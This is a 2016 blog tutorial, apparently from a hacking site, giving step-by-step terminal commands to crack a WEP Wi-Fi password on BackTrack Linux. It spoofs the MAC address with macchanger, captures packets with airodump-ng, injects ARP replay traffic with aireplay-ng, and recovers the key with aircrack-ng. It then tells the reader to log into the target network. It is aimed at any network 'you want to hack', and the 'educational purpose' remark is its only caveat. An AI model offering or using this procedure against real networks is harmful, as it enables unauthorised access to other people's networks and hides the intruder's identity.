Tutorial for Cracking Wifi WEP Password Using Linux 2016
Tutorial for Cracking Wifi WEP Password Using Linux 2016 |
This tutorial focus on Cracking Wi-Fi Password using Linux
OS. In my previous post I have explained some of the most used hacking tools in 2016, make sure to read that post first here. We will be using some of
those tools in Cracking WEP Passwords. Let’s start the process:
Remark: These and all tutorials at TheCyberHacker are
for educational purpose.
Download the BackTrack (Linux OS) flavor of your choice. You
can either boot the OS using VMware within windows, or you can boot backtrack
straight off of a DVD or flash drive. Instructions for each of these methods
are on the Back track’s official website.
Once you have booted up backtrack, it will ask you for a
username and password; for username: root & for password: toor.
Now type startx and press enter. This will log you into
backtrack and you should now see the desktop.
Open a command terminal. You can do this by clicking the
black box icon bottom left corner of the screen.
Type in: airmon-ng
Look for the name of your wireless card, its different for a
lot of computers, mine is wlan01, so for the rest of this tutorial that’s what
I’m going to use. Replace wlan01 in all the following steps with whatever your
device name is.
Type in command terminal: airmon-ng stop wlan01
Type in command terminal: macchanger --mac 00:11:22:33:44:55
wlan01
Type in command terminal: airmon-ng start wlan01
Type in command terminal: airodump-ng wlan01
You will now see all of the wifi networks in range. Once you
found the one you want to hack, press Ctrl + C to stop scanning. Take note of
the bssid and channel of the network you want to hack.
Type in command terminal: airodump-ng -c (put the channel #
here) -w wephack --bssid (enter bssid here) wlan01
Keep that window open, now open another command terminal and
enter the following in the newly opened terminal:
Type in command terminal: aireplay-ng -1 0 -a (enter bssid
here) -h 00:11:22:33:44:55 wlan01
Type in command terminal: aireplay-ng -3 -b (enter bssid
here) -h 00:11:22:33:44:55 wlan01
Now go back to the 1st window, you'll notice a number
steadily increasing. Once it’s over about 10,000 you can attempt to crack the
WEP key. If this doesn't work, wait until the (Number#) is even higher, try
again at a rate of 15,000 or so.
Open a new command window and type: aircrack-ng -b (enter
bssid) wephack-0.cap
You should now see it attempting to crack the WEP key. This
could take up to 5 minutes or so depending on how fast your computer is. When
it’s found the key, it will appear on the screen. You can now log into that
network using the WEP on the screen.
This tutorial can be used in Ubuntu as well, but you should
install Aircracking-ng & Airmong manually because they are not installed as
default. Note that these software are already installed in BackTrack OS.
1 comments:
Click here for commentswww.technicalbud.com
ConversionConversion EmoticonEmoticon